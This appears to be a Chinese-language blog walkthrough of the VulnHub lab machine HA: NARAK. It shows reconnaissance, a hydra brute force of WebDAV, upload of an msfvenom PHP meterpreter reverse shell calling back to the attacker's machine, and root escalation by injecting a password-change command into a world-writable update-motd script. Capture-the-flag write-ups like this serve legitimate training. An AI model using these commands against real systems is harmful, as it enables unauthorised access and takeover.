HA NARAK渗透测试

已于 2023-07-29 22:36:34 修改
阅读量294 收藏
点赞数 2
文章标签: 网络安全
于 2023-07-29 22:29:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jianmuhtb/article/details/132000950
版权

HA: NARAK靶场渗透测试

文章目录


image-20230729135340478

0x01 环境

image-20230729135708286

  • 攻击机:kali2023.4
  • 环境:VMware
  • 网络:NAT

0x02 信息收集

  • 查看本机网络信息(攻击机)
┌──(kali㉿kali)-[~]
└─$ ifconfig            
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.48.130  netmask 255.255.255.0  broadcast 192.168.48.255
        inet6 fe80::f2d9:5916:50bf:76a9  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:95:c9:f6  txqueuelen 1000  (Ethernet)
        RX packets 18061  bytes 12035305 (11.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 15137  bytes 1681658 (1.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • nmap对c段网络进行扫描
nmap 192.168.48.0/24

发现192.168.48.133主机,开放端口:22,80

image-20230729141217432

http服务是开放的,进去看看

image-20230729164732242

  • 目录爆破

    dirb http:192.168.48.133

image-20230729164910107

获得一个webdav目录,然后需要账号密码登录,于是使用cewl 来生成一个账号和密码的字典

  • cewl 爬取网站关键字生成字典
cewl 192.168.48.133 -w narak.txt

image-20230729165047637

0x03 密码爆破

  • 使用hydra对webdav的账号密码进行爆破,利用刚刚得到的字典
hydra -L narak.txt -P narak.txt 192.168.48.133 http-get /webdav

image-20230729165323302
获得一对密钥:yamdoot:Swarg

  • 使用cadver(继续linux终端的webdav交互客户端)进行登录
cadaver http://192.168.48.133/webdav

image-20230729165350258

  • 使用msfvenom生成基于php的反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.48.130 lport=5555 -o shell.php

image-20230729165431788
然后用cadaver的put命令上传
image-20230729165559855

  • 使用msf中的监听,设置payload lhost lport之后开启监听

image-20230729165851629
然后在网页中打开http://192.168.48.133/webdav/shell.php以执行php

image-20230729165936551
可以看到连接成功

0x04 shell反弹连接获取user.txt

  • 链接成功后用下面的命令改善回显
python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20230729170137659

反弹的用户为www用户,在/home/inferno/user.txt中获取到flag1

image-20230729170429381
试图通过命令直接找root.txt没找到
image-20230729170530164

  • 使用find命令搜索:从根目录开始搜索任何用户都可以写的文件有哪些
find / -type f -perm -ug=x,o=w 2>/dev/null

找到一个可疑的/mnt/hell.sh
image-20230729171020824
cat hell.sh发现里面的内容是密文,经过了解,这是brainfuck加密方式,并且发现任何用户都可以对update-motd.d下的文件写操作

  • brainfuck解码
    image-20230729170930861

image-20230729171122715

解得一个明文:chitragupt,猜测是某个用户的密码,因为前面的update-motd.d下的文件是需要ssh用户登录之后才会以root权限执行,所以提示应该是一个用户的密码,并且要用ssh登录,后面经过尝试,是inferno的密码

0x05 update-motd.d可写漏洞,提权获取root.txt

登录inferno用户
image-20230729172840991

看一下有什么权限,没什么收货
image-20230729172918385

  • 对00-header下手
    image-20230729172959175
echo 'echo "root:123456" | sudo chpasswd' >>/etc/update-motd.d/00-header
#在00-header文件后面追加写入更改root密码的命令

查看是否追加成功,有2行是因为之前有测试过一次
image-20230729173402109

update-motd介绍:就是说任何用户ssh登录时,都会以root权限执行欢迎脚本

image-20230729162914405

  • 重新ssh登录,以执行藏在欢迎脚本中的更改密码脚本

image-20230729173653863

su root并用123456密码登录成功,提权成功

  • 获取flag2:root.txt
    image-20230729164517256
Jianmuhtb
关注
[靶机渗透笔记] 4.HA-NARAK
H4ppyD0g的博客
05-05 1784
制定了一个小目标,做100个靶机渗透实验,并记录在此平台上,按照顺序排序,同时也希望能够帮助到一起进步的各位。笔者声明,此系列文章只为学习研究使用,请勿将本文章内的任何技能用于真实环境。 系列文章 [靶机渗透笔记] 1.MONEYBOX: 1 [靶机渗透笔记] 2.HACKADEMIC: RTB1 [靶机渗透笔记] 3.BOREDHACKERBLOG: MORIARTY CORP 文章目录靶机链接确定靶机目录扫描密码爆破定制字典hydra爆破获取webshell主机信息搜集-配置不当提权-修改motd文件
VulnHub narak
weixin_45682839的博客
10-21 1249
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
VulnHub靶场之HA: NARAK
A_dmin的博客
10-01 1693
VulnHub靶场之HA: NARAK 一开始扫描存活主机ip: 执行命令:nmap -sV -p 1-65535 192.168.198.148 先查看80端口,是一个网页: 目录扫描: 发现存在一个401的登陆页面,利用cewl生成字典: 利用hydra对其进行爆破,hydra -L woldlist.txt -P woldlist.txt 192.168.198.148 http-get /webdav 得到账号密码yamdoot:Swarg: 成功进入: 后面没有思路了,,,emmmm
靶机渗透测试HA: NARAK
@小张小张的博客
10-24 2956
靶机渗透测试HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
VulnHub渗透测试实战靶场-HANARAK
LYJ20010728的博客
08-20 877
VulnHub渗透测试实战靶场-HANARAK环境下载HANARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HANARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.140 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
VulnHub靶场HA: NARAK练习 - 修改00-header文件进行提权
qq_43232893的博客
10-15 652
VulnHub靶场HA: NARAK练习简介开始 简介 攻击机ip:192.168.255.139 靶机ip: 192.168.255.142 靶机下载地址: 开始 使用nmap找到靶机地址并扫描端口 找到靶机ip,使用nmap -sV -Pn -p- -v 192.168.255.142进行端口扫描 发现开启了个80跟22端口,访问一下80端口: 什么都没有,再看看有没有敏感目录 发现了一个401登录界面 利用cewl生成字典 cewl 192.168.255.142 -w 1.txt 再使
Vulnhub靶场随笔HA:Narak
weixin_59005129的博客
10-23 110
咱们提权还有一个方法,老生常谈了属于是 内核漏洞提权CVE-2021-3493 /etc/update-motd.d/00-header
靶机渗透测试narak
x_13579的博客
07-03 521
hydra爆破,cewl爬取
靶机练习 narak ,个人学习心得
09-08
在这个练习中,我们使用的靶机是 NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP 地址 在渗透测试中,第一步就是探测靶机的 IP 地址。我们可以使用 fping 命令来探测 IP 地址,例如:`fping -aqg 192.168.71.0...
靶机:narak
weixin_50339323的博客
08-04 1679
靶机网址:https://www.vulnhub.com/entry/ha-narak,569/ 目录 一、信息搜集: 二、漏洞利用与探测: 三、提权 一、信息搜集: 获取IP: nmap -sP 192.168.8.0/24 端口扫描: nmap -sV -p- -sC 192.168.8.132 -n -vv 22、80端口均开启 访问192.168.8.132 从页面搜索信息 · 翻译了一下网页内容信息提取关键字或许有用: yamdoot,...
[VulnHub靶机渗透] HA: Narak
人若无名,便可专心练剑
02-22 1562
学渗透必打百台靶机实操精讲-Narak。涉及UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限。相比之前的视频,增加了些新知识,值得玩味的攻击链。可以结合靶机实操。
靶机渗透之narak
weixin_64267091的博客
02-04 1193
在这次靶机渗透过程中,走到漏洞分析阶段路就断了,发现在信息收集部分可能遗漏掉一些重要信息,最后又重点扫描了一些常见的UDP端口,最后扫出来了一个69端口。然后就利用这个服务找到了一个用户名及其密码,成功访问webdav。然后使用davtest测试webdav可以上传和执行哪些文件,发现可以上传并执行php,利用cadaver客户端上传反弹shell的php文件并访问shell.php,然后通过寻找敏感文件初步提权,找到brainfuck代码,用beef工具解码,发现了用户名inferno的ssh密码。
Vulnhub-HA-NARAK靶机测试
qq_46015509的博客
04-24 2629
Vulnhub-HA-NARAK 靶机渗透
Vulnhub靶机:HA_ NARAK
LainWith的博客
08-03 663
HA(此系列共17台)发布日期:2020年9月23日难度: 中目标: 取得 root 权限 + 2 Flag注释: 使用爆破,使用vmware虚拟机运行主机发现端口扫描信息收集密码字典定制爆破密码webdav漏洞PUT方法上传BF语言解码MOTD注入CVE-2021-3493提权。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8556
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
泰迪杯 : 基于 python 实现 运输车辆安全驾驶行为的分析
11-18
【作品名称】:泰迪杯 : 基于 python 实现 运输车辆安全驾驶行为的分析 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 在车辆运输过程中,不良驾驶行为主要包括疲劳驾驶、急加速、急减速、怠速预热、 超长怠速、熄火滑行、超速、急变道等。 针对以上运输车辆的不良驾驶行为,给出不同不良驾驶行为的判别标准,行车安全评价模型如下: 疲劳驾驶:连续行车时间超过4小时。 提取数据思路:若某一行acc_state列值为1并且gps_speed列数值大于0,则认为汽车开始启动,继续扫描数据表,直到寻找到一行gps_speed列的数值为0,则认为汽车已经处于停止状态,再根据location_time列由两个数据获取时间间隔,判断是否属于疲劳驾驶。 急加速、急减速:每两个经纬度间汽车的加速度达到或者超过20km/s^2。两个经纬度间汽车的加速 【资源声明】:本资源作为“参考资料”而不是“定制需求”,代码只能作为参考,不能完全复制照搬。需要有一定的基础看懂代码,自行调试代码并解决报错,能自行添加功能修改代码。
基于springboot的校园社交平台源码数据库文档.zip
最新发布
11-18
基于springboot的校园社交平台源码数据库文档.zip
scipy-1.7.1-cp37-cp37m-linux_armv7l.whl
11-18
scipy-1.7.1-cp37-cp37m-linux_armv7l.whl
java源码资源EJB 模拟银行ATM流程及操作源代码
11-18
java源码资源EJB 模拟银行ATM流程及操作源代码提取方式是百度网盘分享地址
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值